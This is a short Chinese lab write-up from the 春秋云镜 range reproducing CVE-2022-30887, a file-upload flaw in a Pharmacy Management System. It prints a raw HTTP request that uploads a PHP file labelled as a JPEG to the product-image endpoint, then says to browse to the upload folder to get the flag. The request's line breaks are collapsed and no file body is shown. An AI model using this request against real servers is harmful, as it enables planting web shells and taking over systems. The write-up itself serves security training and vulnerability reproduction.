春秋云镜CVE-2022-30887 Pharmacy Management System shell upload漏洞复现

在打开页面之后进行刷新并且进行抓包，将数据包替换为如下数据包

POST /php_action/editProductImage.php?id=1 HTTP/1.1Host: ip:portUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=---------------------------208935235035266125502673738631Content-Length: 556Connection: closeCookie: PHPSESSID=t1jo541l52f76t9upiu0pbqv0cUpgrade-Insecure-Requests: 1-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="old_image"-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="productImage"; filename="xxx.php"Content-Type: image/jpeg-----------------------------208935235035266125502673738631Content-Disposition: form-data; name="btn"-----------------------------208935235035266125502673738631--————————————————

直接使用此数据包进行文件传输查看是否可以成功上传success

这样子就表示文件成功上传了

进行页面访问 ip:port/assets/myimages/文件名

成功拿到flag

来源地址：https://blog.csdn.net/Ambition_sec/article/details/127897281